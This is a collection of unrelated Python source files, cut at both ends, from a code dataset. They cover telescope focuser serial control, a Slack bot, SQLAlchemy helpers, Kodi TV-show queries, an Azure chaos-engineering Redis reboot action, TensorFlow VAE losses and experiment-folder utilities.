function:\n\t - Load configuration file and check serial port connection settings.\n\t - Open a serial port connection to the focuser\n\t - Set the device name and type in the onboard focuser configuration.\n\t - Set the LED brightness.\n\t - Set everything required for the temperature compensation, even if it is\n\t\t\tnot used\n\t - Set everything for the backlash compensation, even if it is not used.\n\t - Close the port.\n\t \n\t PARAMETERS:\n\t \n\t config_file_name = name of the file containing configuration settings for \n\t\tthe focuser\n\t config_file_loc = directory to find the configuration file\n\t \n\t\"\"\"\n\n\tconfig_dict = common.load_config(config_file_name, path = config_file_loc)\n\tcheck_config_port_values_for_focuser(config_dict)\n\topen_p = common.open_port_from_config_param(config_dict)\n\n\tfocuser_no = config_dict['focuser_no']\n\t#start loading the settings\n\tset_device_name(open_p, device_name = config_dict['focuser_name'],\n\t\tx=focuser_no)\n\tset_device_type(open_p, device_type= config_dict['device_type'],\n\t\tx=focuser_no)\n\tset_LED_brightness(config_dict['LED_brightness'], open_p)\n\n\t#set temperature compensation settings:\n\tset_temp_comp(open_p, temp_comp = config_dict['temp_compen'], x=focuser_no)\n\tset_temp_comp_start_state(open_p,\n\t\ttemp_comp_start = config_dict['temp_compen_at_start'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode= 'A',\n\t\ttemp_coeff_val=config_dict['temp_coeffA'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode='B',\n\t\ttemp_coeff_val=config_dict['temp_coeffB'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode='C',\n\t\ttemp_coeff_val= config_dict['temp_coeffC'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode='D',\n\t\ttemp_coeff_val=config_dict['temp_coeffD'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode='E',\n\t\ttemp_coeff_val=config_dict['temp_coeffE'], x= focuser_no)\n\tset_temp_comp_mode(open_p, mode = config_dict['temp_compen_mode'],\n\t\tx= focuser_no)\n\n\t#Set backlash 
settings:\n\tset_backlash_comp(open_p, backlash_comp = config_dict['backlash_compen'],\n\t\tx= focuser_no)\n\tset_backlash_steps(open_p, backlash_steps = config_dict['backlash_steps'],\n\t\tx= focuser_no )\n\t\n\tget_focuser_stored_config(open_p, x= focuser_no)\n\n\t#close the port\n\tcommon.close_port(open_p)\n\ndef startup_focuser(config_file_name, config_file_loc = 'configs/'):\n\t\"\"\"\n\t\n\tThis function will perform any startup operations, to make it so the\n\t focuser is ready to work. Return the open port ready for sending further \n\t instructions.\n\t \n\tPARAMETERS:\n\t \n\t config_file_name = name of the file containing configuration settings for \n\t\tthe focuser\n\t config_file_loc = directory to find the configuration file\n\t \n\tRETURN\n\t\n\t\tfocuser_no = Number of the focuser that has been started up\n\t\topen_p = the serial port that has been opened for future communication.\n\t \n\t\"\"\"\n\tconfig_dict = common.load_config(config_file_name, path = config_file_loc)\n\tcheck_config_port_values_for_focuser(config_dict)\n\topen_p = common.open_port_from_config_param(config_dict)\n\tfocuser_no = config_dict['focuser_no']\n\n\t#home_focuser(open_p, x = focuser_no)\n\t\n\t\n\tcurrent_config=get_focuser_stored_config(open_p, x = focuser_no,\n\t\treturn_dict=True)\n\t# note: the values parsed from the controller reply are strings, not ints\n\tif current_config['TComp ON'] == '1':\n\t\tfocus_logger.info('Focuser '+str(focuser_no)+': Temperature '\\\n\t\t\t'compensation - ON')\n\telse:\n\t\tfocus_logger.info('Focuser '+str(focuser_no)+': Temperature '\\\n\t\t\t'compensation - OFF')\n\tif current_config['BLC En'] == '1':\n\t\tfocus_logger.info('Focuser '+str(focuser_no)+': Backlash compensation'\\\n\t\t\t' - ON')\n\telse:\n\t\tfocus_logger.info('Focuser '+str(focuser_no)+': Backlash compensation '\\\n\t\t\t'- OFF')\n\n\tfocus_logger.info('Startup for Focuser '+str(focuser_no)+' complete.')\n\n\treturn focuser_no, open_p\n\ndef shutdown_focuser(open_p, x=1):\n\t\"\"\"\n\t\n\tThis function will perform any shutdown operations at the end of the night \n\t\tor during shutdown. 
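A sketch of the intended lifecycle (the config file name here is hypothetical):\n\t\n\t\tfocuser_no, open_p = startup_focuser('focuser_south.cfg')\n\t\t# ... observing ...\n\t\tshutdown_focuser(open_p, x=focuser_no)\n\t\n\t 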
Then close the serial port connection\n\n\tPARAMETERS:\n\t\t\n\t\topen_p = an open serial port connection to the focuser\n\t\tx = focuser number\n\t\n\t\"\"\"\n\n\t#center_focuser(open_p)\n\topen_p.close()\n\n\tfocus_logger.info('Serial port connection to focuser has been closed')\n\n\"\"\"\n\t#Might be used for testing the status setup\n\tSTATUS1\\nTemp(C) = +21.7\\nCurr Pos = 108085\\nTarg Pos = 000000\\nIsMoving \n\t\t= 1\\nIsHoming = 1\\nIsHomed = 0\\nFFDetect = 0\\nTmpProbe = 1\\nRemoteIO \n\t\t= 0\\nHnd Ctlr = 0\\nEND\n\t\n\tCONFIG\\nNickname = FocusLynx Foc2\\nMax Pos = 125440\\nDevTyp =OE\\nTComp ON \n\t\t= 0\\nTempCo A = +0086\\nTempCo B = +0086\\nTempCo C = +0086\\nTempCo D = \n\t\t+0000\\nTempCo E = +0000\\nTCMode =A\\nBLC En =0\\nBLC Stps = +40\\nLED Brt \n\t\t= 075\\nTC@Start = 0\\nEND\n\"\"\"\n","sub_path":"focuser_control.py","file_name":"focuser_control.py","file_ext":"py","file_size_in_byte":36260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"579594423","text":"import os\nimport time\nfrom slackclient import SlackClient\n\n# ticketbro's bot ID\nBOT_ID = os.environ.get(\"BOT_ID\")\n\n# constants\nAT_BOT = \"<@\" + BOT_ID + \">:\"\nEXAMPLE_COMMAND = \"do\"\nFAM = \"fam?\"\n\n# instantiate slack client\nslack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))\n\ndef handle_command(command, channel):\n\t\"\"\"\n\t\tReceives commands directed at the bot and checks if they're valid.\n\t\tIf not, it comes back and asks for more info.\n\t\"\"\"\n\tresponse = \"That looks wrong. Use the *\" + EXAMPLE_COMMAND + \\\n\t\t\t\t\"* command with numbers, delimited by spaces.\"\n\tif command.startswith(EXAMPLE_COMMAND):\n\t\tresponse = \"I got this.\"\n\n\tif command.startswith(FAM):\n\t\tresponse = \"Hello, fam.\"\n\n\tslack_client.api_call(\"chat.postMessage\", channel=channel,\n\t\t\t\t\t\t text=response, as_user=True)\n\ndef parse_slack_output(slack_rtm_output):\n\t\"\"\"\n\t\tThis method checks the slack RTM API to see if any of the messages\n\t\tare directed at this bot and acts accordingly.\n\t\"\"\"\n\toutput_list = slack_rtm_output\n\tif output_list and len(output_list) > 0:\n\t\tfor output in output_list:\n\t\t\tif output and 'text' in output and AT_BOT in output['text']:\n\t\t\t\t# return text after the @, trim whitespace\n\t\t\t\treturn output['text'].split(AT_BOT)[1].strip().lower(), \\\n\t\t\t\t output['channel']\n\treturn None, None\n\n# start it up\nif __name__ == \"__main__\":\n\tREAD_WEBSOCKET_DELAY = 1\n\tif slack_client.rtm_connect():\n\t\tprint(\"ticketbro is ticketbroing\")\n\t\twhile True:\n\t\t\tcommand, channel = parse_slack_output(slack_client.rtm_read())\n\t\t\tif command and channel:\n\t\t\t\thandle_command(command, channel)\n\t\t\ttime.sleep(READ_WEBSOCKET_DELAY)\n\telse:\n\t\tprint(\"he failed, bro. 
check yourself.\")","sub_path":"ticketbro.py","file_name":"ticketbro.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"158901326","text":"from sqlalchemy.ext.declarative import DeclarativeMeta\nfrom sqlalchemy.orm.attributes import InstrumentedAttribute\n\nfrom common.cryptodome import AesCrypt\n\n\nclass ControllerBase(object):\n def __init__(self, table_cls):\n if isinstance(table_cls, DeclarativeMeta):\n table_cls = [table_cls]\n\n self.table_cls_map = {c.__tablename__: c\n for c in table_cls}\n self.table_cls_map.update({'default': table_cls[0]})\n self._session = None\n\n @staticmethod\n def format_return(success, msg='', info=None, **kwargs):\n if not isinstance(success, bool) or not isinstance(msg, str):\n raise Exception('format illegal.')\n ret = {'success': success, 'msg': msg, 'info': info}\n ret.update(kwargs)\n return ret\n\n def get_table_keys(self, table_name='default'):\n return [c for c, v in self.table_cls_map[table_name].__dict__.items()\n if isinstance(v, InstrumentedAttribute)]\n\n @property\n def session(self):\n return self._session\n\n @session.setter\n def session(self, session):\n self._session = session\n\n @session.getter\n def session(self):\n return self._session\n\n def commit(self):\n try:\n self.session.commit()\n except Exception as err:\n self.session.rollback()\n raise err\n finally:\n self.session.close()\n\n def _get(self, filter_dict, table_name='default', **kwargs):\n if not isinstance(filter_dict, dict):\n raise Exception('param filter is not dict.')\n filter_params = []\n for k, v in filter_dict.items():\n k_operator = k.split('.')\n if len(k_operator) == 2:\n k, operator = k_operator\n part_filter = getattr(getattr(self.table_cls_map[table_name], k), operator)(v)\n elif len(k_operator) == 1:\n k = k_operator[0]\n if k.startswith('^'):\n part_filter = getattr(self.table_cls_map[table_name], k) != v\n else:\n part_filter = getattr(self.table_cls_map[table_name], k) == v\n else:\n raise Exception('illegal key: [%s]' % k)\n\n filter_params.append(part_filter)\n\n query_obj = self._session.query(self.table_cls_map[table_name]).filter(*filter_params)\n query_method = kwargs.get('query_method', 'all')\n info = getattr(query_obj, query_method)()\n if isinstance(info, list):\n info = [i.serialize() for i in info]\n else:\n info = info.serialize() if info else None\n return info\n\n def _add(self, add_dict, table_name='default'):\n instance = self.table_cls_map[table_name](**add_dict)\n self._session.add(instance)\n return instance.serialize()\n\n def _update(self, query_dict, update_dict, table_name='default'):\n filter_params = [getattr(self.table_cls_map[table_name], k) == v\n for k, v in query_dict.items()]\n\n instance_list = self._session.query(\n self.table_cls_map[table_name]).filter(*filter_params).all()\n for instance in instance_list:\n for k, v in update_dict.items():\n setattr(instance, k, v)\n\n return [ins.serialize() for ins in instance_list]\n\n def _delete(self, query_dict, table_name='default'):\n filter_params = [getattr(self.table_cls_map[table_name], k) == v\n for k, v in query_dict.items()]\n\n self._session.query(self.table_cls_map[table_name]\n ).filter(*filter_params).delete()\n return True\n\n\n @staticmethod\n def encrypt(string, crypt_type='AES'):\n if crypt_type == 'AES':\n return AesCrypt().encrypt(string)\n else:\n raise Exception('crypt_type not supported')\n\n @staticmethod\n def decrypt(string, crypt_type='AES'):\n if 
crypt_type == 'AES':\n return AesCrypt().decrypt(string)\n else:\n raise Exception('crypt_type not supported')\n","sub_path":"my_project/controllers/base/base_controller.py","file_name":"base_controller.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"22641710","text":"# Code inspired by this website:\n# https://www.tutorialspoint.com/python/python_binary_tree.htm\n\n# Can't use, exceeds Python's maximum recursion depth\n\n\nclass BinaryTreeNode:\n # Allows for a root node to be added to the tree, not required\n def __init__(self, pixel_id=None):\n self.data = pixel_id\n self.left = None\n self.right = None\n\n def insert_node(self, pixel_data):\n # Check if the node being inserted is the root node\n if self.data is None:\n self.data = pixel_data\n\n # The node being inserted will not be the root and will lie in one of the branches of the tree\n else:\n if pixel_data < self.data:\n if self.left is None:\n self.left = BinaryTreeNode(pixel_data)\n else:\n self.left.insert_node(pixel_data)\n elif pixel_data > self.data:\n if self.right is None:\n self.right = BinaryTreeNode(pixel_data)\n else:\n self.right.insert_node(pixel_data)\n\n # Debugging purposes\n def print_tree(self):\n if self.left:\n self.left.print_tree()\n print(self.data)\n if self.right:\n self.right.print_tree()\n","sub_path":"tree_ops.py","file_name":"tree_ops.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"48030015","text":"from mycroft.util.log import LOG\nimport requests\nimport json\n\n\ndef get_tv_show(kodi_path, show_title, season_number, episode_number):\n show_id = get_show(kodi_path, show_title)[0]['tvshowid']\n LOG.info('Found ShowID: ' + str(show_id))\n episode_details = get_episode(kodi_path, show_id, season_number, episode_number)\n print('Found Episode Details: ' + str(episode_details))\n return episode_details\n\n\ndef get_show(kodi_path, search_words):\n \"\"\"\n 1. need to confirm the TVShow (returns tvshowID)\n 2. Search for VideoLibrary.GetSeasons (uses Season number as integer)\n 3. 
Search for VideoLibrary.GetEpisodes (uses episode number as integer)\n \"\"\"\n filter_key = []\n for each_word in search_words:\n search_key = {\n \"field\": \"title\",\n \"operator\": \"contains\",\n \"value\": each_word.strip()\n }\n filter_key.append(search_key)\n # Make the request\n json_header = {'content-type': 'application/json'}\n method = \"VideoLibrary.GetTVShows\"\n kodi_payload = {\n \"jsonrpc\": \"2.0\",\n \"method\": method,\n \"id\": \"libTvShows\",\n \"params\": {\n \"properties\": [\n \"file\",\n \"thumbnail\",\n \"fanart\"\n ],\n \"filter\": {\n \"and\": filter_key\n }\n }\n }\n try:\n kodi_response = requests.post(kodi_path, data=json.dumps(kodi_payload), headers=json_header)\n item_list = json.loads(kodi_response.text)[\"result\"]['tvshows']\n # remove duplicates\n clean_list = [] # this is a dict\n for each_item in item_list:\n item_title = str(each_item['label'])\n info = {\n \"label\": each_item['label'],\n \"tvshowid\": each_item['tvshowid'],\n \"fanart\": each_item['fanart'],\n \"thumbnail\": each_item['thumbnail'],\n \"filename\": each_item['file']\n }\n if item_title.lower() not in str(clean_list).lower():\n clean_list.append(info)\n else:\n if len(each_item['label']) == len(item_title):\n print('Removing Duplicate Entries')\n else:\n clean_list.append(info)\n return clean_list # returns a dictionary of matched movies\n except Exception as e:\n print(e)\n return None\n\n\ndef get_episode(kodi_path, showID, seasonNum, episodeNum):\n \"\"\"\n 1. need to confirm the TVShow (returns tvshowID)\n 2. Search for VideoLibrary.GetSeasons (uses Season number as integer)\n 3. Search for VideoLibrary.GetEpisodes (uses episode number as integer)\n \"\"\"\n search_key = {\n \"field\": \"episode\",\n \"operator\": \"contains\",\n \"value\": int(episodeNum)\n }\n json_header = {'content-type': 'application/json'}\n method = \"VideoLibrary.GetEpisodes\"\n kodi_payload = {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": method,\n \"params\": {\n \"tvshowid\": showID,\n \"season\": seasonNum,\n \"properties\": [\n \"season\",\n \"episode\",\n \"file\",\n \"fanart\",\n \"thumbnail\",\n \"playcount\"\n ],\n }\n }\n try:\n kodi_response = requests.post(kodi_path, data=json.dumps(kodi_payload), headers=json_header)\n item_list = json.loads(kodi_response.text)[\"result\"][\"episodes\"]\n for each_item in item_list:\n if each_item[\"episode\"] == episodeNum:\n return each_item\n return None # returns a dictionary of matched movies\n except Exception as e:\n print(e)\n return None\n","sub_path":"kodi_tools/GetRequestedTVShows.py","file_name":"GetRequestedTVShows.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"542178328","text":"# -*- coding: utf-8 -*-\nimport re\n\nfrom azure.mgmt.redis import RedisManagementClient\nfrom chaoslib.exceptions import FailedActivity\nfrom chaoslib.types import Configuration, Secrets\nfrom logzero import logger\n\nfrom chaosazure import init_redis_client\nfrom chaosazure.common import cleanse\nfrom chaosazure.redis.constants import RES_TYPE_SRV_CACHE_REDIS\nfrom chaosazure.common.resources.graph import fetch_resources\n\n__all__ = [\"reboot_redis\"]\n\nfrom chaosazure.vmss.records import Records\n\n\ndef reboot_redis(filter: str = None,\n configuration: Configuration = None,\n secrets: Secrets = None):\n \"\"\"\n reboot_redis redis\n\n Parameters\n ----------\n filter : str, optional\n Filter the servers. 
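A hypothetical call using the resource-graph (Kusto) filter syntax:\n\n reboot_redis(filter=\"where resourceGroup=='rg'\")\n\n 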
If the filter is omitted all servers in\n the subscription will be selected as potential chaos candidates.\n\n Examples\n --------\n Some calling examples. Deep dive into the filter syntax:\n https://docs.microsoft.com/en-us/azure/kusto/query/\n\n \"\"\"\n logger.debug(\n \"Start reboot_redis: \"\n \"configuration='{}', filter='{}'\".format(configuration, filter))\n\n servers = __fetch_redis(filter, configuration, secrets)\n client = __redis__mgmt_client(secrets, configuration)\n redis_records = Records()\n for s in servers:\n group = s['resourceGroup']\n name = s['name']\n logger.debug(\"Rebooting server: {}\".format(name))\n client.redis.force_reboot(group, name)\n\n redis_records.add(cleanse.redis(s))\n\n return redis_records.output_as_dict('resources')\n\n\n###############################################################################\n# Private helper functions\n###############################################################################\ndef __fetch_redis(filter, configuration, secrets) -> []:\n servers = fetch_resources(filter, RES_TYPE_SRV_CACHE_REDIS, secrets, configuration)\n if not servers:\n logger.warning(\"No redis found\")\n raise FailedActivity(\"No redis found\")\n else:\n logger.debug(\n \"Fetched redis: {}\".format(\n [s['name'] for s in servers]))\n return servers\n\n\ndef __redis__mgmt_client(secrets, configuration):\n return init_redis_client(secrets, configuration)\n","sub_path":"chaosazure/redis/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"417724588","text":"import tensorflow as tf\r\nimport utils.codes as codes\r\nfrom utils.configuration import default_config as config\r\n\r\n## ------------------- LOSS: EXPECTED LOWER BOUND ----------------------\r\n# Reconstruction loss\r\ndef get_reconst_loss(x, x_recons, loss_func, epsilon=config.epsilon):\r\n \"\"\"\r\n Returns the reconstruction loss between x and x_recons\r\n two modes:\r\n OLS:\r\n MSE(x, x_recons) mean squared error\r\n MLE:\r\n Maximum log-likelihood estimator is the expected log-likelihood of the lower bound. 
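(Concretely: -sum( x*log(x_recons + epsilon) + (1-x)*log(1-x_recons + epsilon) ), matching the tf.reduce_sum expression below.) 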
For this we use a Bernoulli LL.\r\n \"\"\"\r\n assert loss_func in codes.properties(codes.Losses), \\\r\n 'Unsupported reconstruction loss loss_func'\r\n if loss_func == codes.Losses.MLE:\r\n return - tf.reduce_sum((x) * tf.log(x_recons + epsilon) +\r\n (1 - x) * tf.log(1 - x_recons + epsilon), 1)\r\n else:\r\n return tf.losses.mean_pairwise_squared_error(x, x_recons)\r\n\r\n\r\n### ---------------------------------------------- Divergences --------------------------------------------\r\ndef get_self_divergence(meanQ, log_varQ, loss_func):\r\n log_varQ = 2.0*log_varQ\r\n P = tf.distributions.Bernoulli(probs=tf.ones(meanQ.shape[-1]))\r\n meanP = P.mean()\r\n log_varP = P.variance()\r\n return get_divergence(meanQ, log_varQ, meanP, log_varP, loss_func)\r\n\ndef get_QP_kl(meanQ, log_varQ, meanP, log_varP):\n \"\"\"\n KL[Q || P] returns the KL-divergence between the prior p and the variational posterior q.\n :param meanQ: vector of means for q\n :param log_varQ: vector of log-variances for q\n :param meanP: vector of means for p\n :param log_varP: vector of log-variances for p\n :return: KL divergence between q and p\n \"\"\"\n #meanQ = posterior_mean\n #log_varQ = posterior_logvar\n #meanP = prior_mean\n #log_varP = prior_logvar\n\n return - 0.5 * tf.reduce_sum(\n log_varP - log_varQ + (tf.square(meanQ - meanP) / tf.exp(log_varP)) + tf.exp(log_varQ - log_varP) - 1)\n\n\r\n\r\ndef get_divergence(meanQ, log_varQ, meanP, log_varP, div_loss):\r\n assert div_loss in codes.properties(codes.Losses)\\\r\n , 'Unsupported divergence loss div_loss'\r\n if div_loss == codes.Losses.KLD:\r\n return get_KL_div(meanQ, log_varQ, meanP, log_varP)\r\n\r\n elif div_loss == codes.Losses.RKLD:\r\n return -get_KL_div(meanP, log_varP, meanQ, log_varQ)\r\n\r\n elif div_loss == codes.Losses.JS:\r\n return get_KL_div(meanQ, log_varQ, meanP, log_varP) * 0.5 + \\\r\n get_KL_div(meanP, log_varP, meanQ, log_varQ) * 0.5\r\n\r\n elif div_loss == codes.Losses.CHI2:\r\n return -0.5 * tf.reduce_sum(tf.exp(log_varP) + log_varQ\r\n -(tf.square(meanQ - meanP) / tf.log(log_varP)-1)**2\r\n - tf.exp(log_varQ - log_varP)**2 , 1)\r\n\r\n elif div_loss == codes.Losses.Helling:\r\n return -0.5 * tf.reduce_sum(tf.exp(log_varP) + log_varQ\r\n -(tf.square(tf.square(meanQ - meanP) / tf.log(log_varP))-1)**2\r\n - tf.exp(log_varQ - log_varP)**2 , 1)\r\n\r\n\r\ndef get_kl(mu, log_var):\r\n \"\"\"\r\n d_kl(q(latent|x)||p(latent)) returns the KL-divergence between the prior p and the variational posterior q.\r\n :return: KL divergence between q and p\r\n \"\"\"\r\n # Formula: - 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\r\n return - 0.5 * tf.reduce_sum( 1.0 + 2.0 * log_var - tf.square(mu) - tf.exp(2.0 * log_var), 1)\r\n\r\ndef get_KL_div(meanQ, log_varQ, meanP, log_varP):\r\n \"\"\"\r\n KL[Q || P] returns the divergence between the prior p and the variational posterior q.\r\n :param meanQ: vector of means for q\r\n :param log_varQ: vector of log-variances for q\r\n :param meanP: vector of means for p\r\n :param log_varP: vector of log-variances for p\r\n :return: KL divergence between q and p\r\n \"\"\"\r\n #meanQ = posterior_mean\r\n #log_varQ = posterior_logvar\r\n #meanP = prior_mean\r\n #log_varP = prior_logvar\r\n\r\n return -0.5 * tf.reduce_sum(tf.exp(log_varP) + log_varQ\r\n -(tf.square(meanQ - meanP) / tf.exp(log_varP))\r\n - tf.exp(log_varQ - log_varP) , 1)\r\n\r\ndef kl_divergence(P, Q, epsilon=config.epsilon):\r\n 
\"\"\"\r\n Compute the Kullback–Leibler divergence between two probability distributions\r\n Args:\r\n P : (tensorflow.placeholder): Tensor storing the target probability distribution\r\n @ : (tensorflow.Variable): Tensor storing the model distribution\r\n Returns:\r\n KLD (tensorflow.Variable): Kullback–Leibler divergence\r\n \"\"\"\r\n Pc = tf.maximum(P, epsilon)\r\n Qc = tf.maximum(Q, epsilon)\r\n\r\n return tf.reduce_sum(P * tf.log(Pc / Qc))\r\n\r\n\r\ndef get_distributions_div_cost(Px, Qx, loss_func, epsilon=config.epsilon):\r\n\r\n assert loss_func in codes.properties(codes.Losses),\\\r\n 'Unsupported divergences loss loss_func'\r\n\r\n if loss_func == codes.Losses.KLD:\r\n return kl_divergence(Px, Qx)\r\n\r\n if loss_func == codes.Losses.RKLD:\r\n return -kl_divergence(Qx, Px)\r\n\r\n elif loss_func == codes.Losses.JS:\r\n return kl_divergence(Px, Qx) * 0.5 + \\\r\n kl_divergence(Qx, Px) * 0.5\r\n\r\n elif loss_func == codes.Losses.CHI2:\r\n Pxc = tf.maximum(Px, epsilon)\r\n Qyc = tf.maximum(Qx, epsilon)\r\n return tf.reduce_sum(Qx * (Pxc / Qyc - 1.) ** 2)\r\n\r\n elif loss_func == codes.Losses.Helling:\r\n Pxc = tf.maximum(Px, epsilon)\r\n Qyc = tf.maximum(Qx, epsilon)\r\n return tf.reduce_sum(Qx * (tf.sqrt(Pxc / Qyc) - 1.) ** 2)\r\n","sub_path":"bases/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"328121009","text":"from sys import argv\n\nscript, name1 = argv\nprompt = '>'\nprint('Hi {0}, i am inside the script {1}'.format(name1, script))\nprint('i would like to ask few questions')\nprint('Do you like me {0}'.format(name1))\nlikes = input(prompt)\nprint('Where do you leave {0}'.format(name1))\nleave = input(prompt)\nprint('What is the name of your computer ?')\ncomputer = input(prompt)\nprint(\"\"\"\nAlright {0},now i understand that\nyou leave in {1} and like {2}.\nAlso i could see that your computer is {3}\n\"\"\".format(name1, likes, leave, computer))\n","sub_path":"ShaW/Part_1/ex14.py","file_name":"ex14.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"9527343","text":"import json\nimport os\nimport re\n#def filenames_to_im_ids( fns ):\n#\treturn [ filename_to_id(fn) for fn in fns ]\n\n#def filename_to_id( fn ):\n#\treturn fn.split('_')[0]\nimport numpy as np\n\n\ndef filenames_to_im_ids( im_files ):\n\tif isinstance(im_files[0], int):\n\t\treturn im_files\n\telif im_files[0].startswith('frame'):\n\t\tim_file_ids = [ int( os.path.splitext(os.path.basename(f))[0].split('_')[1] ) for f in im_files ]\n\t\treturn im_file_ids\n\n\ttry:\n\t\tint(im_files[0])\n\t\tim_file_ids = [ int( os.path.splitext(os.path.basename(f))[0] ) for f in im_files ]\n\t\n\texcept ValueError:\n\t\t'''\n\t\t# just return these as strings? 
not sure why I wanted to do the conversion\n\t\tim_file_ids = [os.path.splitext(os.path.basename(f))[0] for f in im_files]\n\t\t\n\t\t'''\n\t\tif '_' in im_files[0]:\n\t\t\tim_file_ids = [ int( os.path.splitext(os.path.basename(f))[0].split('_')[0] ) for f in im_files ]\n\t\telse:\n\t\t\tim_file_ids = im_files[:]\n\t\t\tfor i,f in enumerate(im_files):\n\t\t\t\tcurr_str = []\n\t\t\t\tfirst_seg = os.path.splitext(os.path.basename(f))[0].replace('_','') # TODO: check this for all naming formats we use\n\t\t\t\tfor c in first_seg:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcurr_str.append( str(int(c)))\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\tcurr_str.append( str(ord(c)))\n\t\t\t\tim_file_ids[i] = int(''.join(curr_str))\n\t#\t\tim_file_ids = [ ''.join([str(ord(c)) for c in ]) for f in im_files ]\n\t#\t\tprint(im_file_ids)\n\treturn im_file_ids\n\n\ndef make_output_dirs(base_model_name, prompt_delete=True, exp_root ='./experiments/'):\n\tfig_root = './figures/'\n\tlog_root = './logs/'\n\tmodel_root = './models/'\n\n\texperiment_dir = exp_root + base_model_name\n\n\tfigures_dir = exp_root + base_model_name + '/figures'\n\tlogs_dir = exp_root + base_model_name + '/logs'\n\tmodels_dir = exp_root + base_model_name + '/models'\n\n\tmodel_name = base_model_name\n\tcopy_count = 0\n\n\twhile os.path.isdir(figures_dir) or os.path.isdir(logs_dir) or os.path.isdir(models_dir):\n\t\t# list existing files\n\t\tif os.path.isdir(figures_dir):\n\t\t\tfigure_files = [os.path.join(figures_dir, f) for f in os.listdir(figures_dir) if\n\t\t\t\t\t\t\tf.endswith('.jpg') or f.endswith('.png')]\n\t\telse:\n\t\t\tfigure_files = []\n\n\t\tif os.path.isdir(logs_dir):\n\t\t\tlog_files = [os.path.join(logs_dir, l) for l in os.listdir(logs_dir) \\\n\t\t\t\t\t\t if os.path.isfile(os.path.join(logs_dir, l))] \\\n\t\t\t\t\t\t+ [os.path.join(experiment_dir, f) for f in os.listdir(experiment_dir) if f.endswith('.log')]\n\t\t\t# also include any .log files\n\t\telse:\n\t\t\tlog_files = []\n\n\t\tif os.path.isdir(models_dir):\n\t\t\tmodel_files = [os.path.join(models_dir, m) for m in os.listdir(models_dir) \\\n\t\t\t\t\t\t if os.path.isfile(os.path.join(models_dir, m))]\n\t\telse:\n\t\t\tmodel_files = []\n\n\t\tif prompt_delete and (len(figure_files) > 0 or len(log_files) > 0 or len(model_files) > 0):\n\t\t\tprint(\n\t\t\t\t'Remove \\n\\t{} figures from {}\\n\\t{} logs from {}\\n\\t{} models from {}?\\n[y]es / [n]o (create new folder) / [C]ontinue existing / remove [m]odels too: [y/n/C/m]'.format(\n\t\t\t\t\tlen(figure_files), figures_dir, len(log_files), logs_dir, len(model_files), models_dir))\n\n\t\t\ttry:\n\t\t\t\tchoice = raw_input().lower()\n\t\t\texcept NameError:\n\t\t\t\t# python 3 syntax\n\t\t\t\tchoice = input().lower()\n\n\t\t\t#\t\t\tif len(choice) == 0:\n\t\t\t#\t\t\t\tchoice=['yes']\n\t\t\tremove_choices = ['yes', 'y', 'ye']\n\t\t\tmake_new_choices = ['no', 'n']\n\t\t\tcontinue_choices = ['c', '']\n\t\t\tremove_models_too = ['m']\n\n\t\t\t#\t\t\tfor c in choice:\n\t\t\tif choice in remove_choices:\n\t\t\t\tfor f in figure_files + log_files:\n\t\t\t\t\tprint('Removing {}'.format(f))\n\t\t\t\t\tos.remove(f)\n\t\t\telif choice in remove_models_too:\n\t\t\t\tfor f in figure_files + log_files + model_files:\n\t\t\t\t\tprint('Removing {}'.format(f))\n\t\t\t\t\tos.remove(f)\n\t\t\telif choice in continue_choices:\n\t\t\t\tprint('Continuing in existing folder...')\n\t\t\t\tbreak\n\n\t\t\telif choice in make_new_choices:\n\t\t\t\tcopy_count += 1\n\t\t\t\tmodel_name = base_model_name + '_{}'.format(copy_count)\n\t\t\t\texperiment_dir = 
exp_root + model_name\n\n\t\t\t\tfigures_dir = exp_root + model_name + '/figures'\n\t\t\t\tlogs_dir = exp_root + model_name + '/logs'\n\t\t\t\tmodels_dir = exp_root + model_name + '/models'\n\t\telse:\n\t\t\tbreak\n\n\tif not os.path.isdir(experiment_dir):\n\t\tos.mkdir(experiment_dir)\n\tif not os.path.isdir(figures_dir):\n\t\tos.mkdir(figures_dir)\n\tif not os.path.isdir(logs_dir):\n\t\tos.mkdir(logs_dir)\n\tif not os.path.isdir(models_dir):\n\t\tos.mkdir(models_dir)\n\treturn model_name, experiment_dir, figures_dir, logs_dir, models_dir\n\ndef _test_make_output_dirs():\n\tmodel_name = '_test_make_output_dirs'\n\tnew_model_name, figures_dir, logs_dir, models_dir = make_output_dirs(model_name)\n\tassert new_model_name == model_name\n\tassert os.path.isdir( figures_dir )\n\tassert os.path.isdir( logs_dir )\n\tassert os.path.isdir( models_dir )\n\n\ndef get_latest_epoch_in_dir( d, match_prefixes = [] ):\n\tmodel_files = [ f for f in os.listdir(d) if f.endswith('.h5') ]\n\n\tepoch_nums = [ re.search( '(?<=epoch)[0-9]*', os.path.basename(f) ).group(0) for f in model_files ]\n\tepoch_nums = list(set([ int(n) for n in epoch_nums if n is not None and n is not '']))\n\tmax_epoch_num = 0\n\n\tif len(epoch_nums) == 0:\n\t\treturn 